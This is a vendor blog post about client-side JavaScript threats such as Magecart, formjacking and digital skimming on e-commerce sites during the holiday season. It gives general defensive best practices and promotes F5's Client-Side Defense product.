Client-Side Defense: The Missing Piece in Your Holiday Security Armor

The online holiday shopping season is well underway, with e-commerce retailers anticipating robust consumer spending: Deloitte projects that e-commerce sales will grow by 12.8% to 14.3%, year-over-year, during the 2022-2023 holiday season, reaching total sales of between $260 billion and $264 billion, according to a report from Retail Info Systems.

That’s a lot of activity on your e-commerce apps—and not all of it will be from happy holiday elves checking their shopping lists.

This is also the time of year that cyberthreat actors ramp up their activities, looking to take advantage of the surge in online holiday shopping.

Coming Soon to a Browser Near You: Client-Side Cyber Threats

Client-side security attacks have become so pervasive and dangerous that the OWASP has compiled a new Top 10 list of browser-based security threats. These include many client-side exploits that threaten e-commerce sites this holiday season, such as formjacking, digital skimming, Magecart, and other browser-based JavaScript vulnerabilities introduced by reliance on third-party JavaScript sources.

To improve the customer journey, dynamic e-commerce websites embed third-party code in their apps to enable common functionality such as payment forms, chatbots, advertising, social sharing buttons, and tracking scripts. These JavaScript features provide out-of-the-box functionality, accelerating time to market and freeing up development resources, but they also result in “shadow code”—code that you did not write, cannot control, changes without your awareness, and does not pass through your organization’s security reviews. Without visibility into the code that runs in your environment, companies cannot detect when code has changed or been compromised. These scripts provide threat actors a wide attack surface to exploit, allowing security incidents to occur directly in the customer’s browser without the user or merchant realizing it.

Types of Client-Side Attacks

Client-side attacks are launched to intercept and manipulate user sessions, with the intent to take control and deface websites, conduct phishing attacks, present fake content, create new forms, hijack legitimate forms requesting the user to provide their social security number or bank account information, or take over the user’s account. Data captured is usually exfiltrated to the attacker’s command and control server.

There are several types of client-side attacks aimed at exploiting third-party JavaScript files.

Magecart attacks are probably the most well known. Magecart is a broader term for a range of software supply chain attacks including formjacking and digital skimming, also called e-skimming, which steal personal data (most commonly customer details and credit card information) from online web payment forms. According to F5 Labs' 2022 Application Protection Report: In Expectation of Exfiltration, formjacking attacks constituted the bulk of web exploits that led to breach disclosures.

Criminals typically leverage the captured customer data to conduct malicious acts such as identity theft or account takeover, or very often to simply harvest the information to package and sell as data dumps on the Dark Web.

Best Practices for Thwarting Client-Side Attacks

Client-side attacks will continue to be a challenge for online organizations as long as criminals are able to embed malicious code into web applications, and these exploits can be particularly damaging during the holidays, when both shoppers and your cybersecurity teams already have plenty of other concerns to focus on. Given how few companies are aware of these types of attacks, and how few have set up proper defense methods to detect and thwart these exploits, attackers will continue to find success.

However, here are some best practices that you can implement to help mitigate client-side risk:

• Conduct a script inventory audit. Inventory all scripts embedded on your site, identify who owns and authorizes them, what they are used for, and how they are maintained. This includes scripts added directly into the HTML of pages as well as scripts added through tag managers. Know what the third-party code you are implementing does, and if it is accessing sensitive data or performing critical functions. Organizations not only need visibility into the JavaScript on their site, they also need to know what the scripts are collecting to prevent violating data privacy regulations like the European Union’s GDPR and the California Consumer Privacy Act (CCPA) and ensure compliance with the upcoming PCI DSS requirements 6.4.3 and 11.
• Establish a third-party risk management framework. Establish a governance structure for adding, monitoring, and maintaining scripts to ensure integrity of each script​. Create a process that allows you to identify when a request for PII or other sensitive information involves sending data to a new domain.
• Apply zero trust. Take a zero-trust approach for all scripts on your site. Never extend blanket trust to anyone. Establish the ability to monitor, detect, and alert when a new script is added, or an existing script is modified. Detection techniques, such as Sub-Resource Integrity (SRI) and Content Security Policy (CSP) still have value but are no longer sufficient to protect today’s constantly changing web applications. Organizations that applied zero trust realized 20.5% lower costs for a data breach than those not using zero trust.
• Establish a rapid mitigation strategy. Explore creating a simple one-click mitigation process that allows you to review script changes and alerts on an interactive dashboard with a tool that provides one-click mitigation to block network calls that maliciously exfiltrate data.

Conclusion: Don’t Overlook the Threat of Client-Side Attacks this Holiday Season

When customers log into their accounts on your e-commerce website over the holidays, they are trusting you with their sensitive personal data. Take the steps necessary to ensure the third-party scripts running in your e-commerce environment cause no harm.

Protect your company and your customers from client-side JavaScript exploits with F5 Distributed Cloud Client-Side Defense, a monitoring and mitigation solution that protects customer credentials, financial details, and personal information against Magecart, formjacking, and other client-side supply chain attacks. This SaaS-based service is quick and easy to deploy, provides immediate value, keeps your customers’ personal and financial data out of the hands of criminals, and protects against data loss that would undermine consumer confidence.

Learn more by watching the video How Merchants Can Defend Themselves against Magecart Attacks and tune into this demo of F5 Distributed Cloud Client-Side Defense.

Don’t let compromised JavaScript sources ruin the holidays for your company and customers.